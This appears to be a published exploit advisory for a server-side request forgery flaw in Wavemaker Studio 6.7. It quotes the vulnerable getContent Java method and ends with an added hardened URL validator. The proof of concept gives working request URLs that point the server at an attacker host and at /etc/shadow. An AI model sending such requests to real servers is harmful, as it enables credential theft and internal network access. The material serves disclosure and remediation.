Wavemaker Studio 6.7 - Server-Side Request Forgery (SSRF)

2018.12.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Wavemaker Studio 6.7 - Server-Side Request Forgery (SSRF)
# Exploit Author: Gionathan "John" Reale
# Google Dork: N/A
# Date: 2018-12-10
# Vendor Homepage: http://www.wavemaker.com/
# Affected Version: 6.7>
# CVE : N/A

# Description
# Wavemaker Studio 6.7 contains an exploitable unvalidated parameter allowing an
# attacker to pass dangerous content to a victim via a phishing link. The vulnerability
# can also be exploited to access sensitive data or to use the server hosting Wavemaker
# as a form of HTTP proxy among other things.

# Proof Of Concept

http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=http://attackersite.com/
http://xxxx.xxxxx:xxxx/wavemaker/studioService.download?method=getContent&inUrl=file:///etc/shadow

# Vulnerable Code
# /wavemaker-studio/services/studioService/src/com/wavemaker/studio/StudioService.java
# Line 419-430

    @ExposeToClient
    public String getContent(String inUrl) throws IOException {
        try {
            // inUrl comes straight from the request and is fetched as given (any scheme, any host)
            String str = getRemoteContent(inUrl);
            // inUrl is also concatenated into the returned HTML without escaping
            str = str.replace("<head>", "<head><base href='" + inUrl
                + "' /><base target='_blank' /><script>top.studio.startPageIFrameLoaded();</script>");
            return str;
        } catch (Exception e) {
            return "";
        }
    }
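
A hardened counterpart to the checks missing from getContent() above, as an added example that is not part of the original advisory or of WaveMaker's code: it limits inUrl to http/https, refuses hosts that resolve to loopback, link-local, private or multicast addresses, and escapes the value before it would go into the base href. The names InUrlValidator, validate and escapeAttr and the sample URLs are assumptions made for illustration.

```java
import java.net.InetAddress;
import java.net.URI;

// Added example, not WaveMaker code: checks a getContent()-style handler could run on inUrl.
public class InUrlValidator {

    /** Returns the parsed URI only for http(s) URLs whose host resolves to public addresses. */
    static URI validate(String inUrl) throws Exception {
        URI uri = new URI(inUrl).normalize();
        String scheme = uri.getScheme();
        // Rejects file:, jar:, ftp: and anything else that is not plain web traffic.
        if (scheme == null || !(scheme.equalsIgnoreCase("http") || scheme.equalsIgnoreCase("https"))) {
            throw new IllegalArgumentException("scheme not allowed");
        }
        String host = uri.getHost();
        if (host == null || uri.getUserInfo() != null) {
            throw new IllegalArgumentException("host missing or userinfo present");
        }
        // Every resolved address must be public; one internal record is enough to refuse.
        for (InetAddress a : InetAddress.getAllByName(host)) {
            byte[] b = a.getAddress();
            boolean uniqueLocalV6 = b.length == 16 && (b[0] & 0xfe) == 0xfc; // fc00::/7
            if (a.isLoopbackAddress() || a.isAnyLocalAddress() || a.isLinkLocalAddress()
                    || a.isSiteLocalAddress() || a.isMulticastAddress() || uniqueLocalV6) {
                throw new IllegalArgumentException("internal address");
            }
        }
        return uri;
    }

    /** Escapes a value for use inside a quoted HTML attribute such as the base href. */
    static String escapeAttr(String s) {
        return s.replace("&", "&amp;").replace("<", "&lt;").replace(">", "&gt;")
                .replace("\"", "&quot;").replace("'", "&#39;");
    }

    public static void main(String[] args) {
        // Constructed sample inputs; IP literals are used so the demo needs no DNS.
        String[] samples = { "file:///etc/shadow", "http://127.0.0.1:8080/", "http://169.254.10.10/",
                             "http://10.0.0.5/", "https://93.184.216.34/" };
        for (String s : samples) {
            try {
                System.out.println("ALLOW " + escapeAttr(validate(s).toString()));
            } catch (Exception e) {
                System.out.println("DENY  " + s + " (" + e.getMessage() + ")");
            }
        }
    }
}
```

The fetch that follows should connect to the address that was validated and re-run the check on every redirect, since a second DNS lookup or a redirect can otherwise still reach an internal host.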

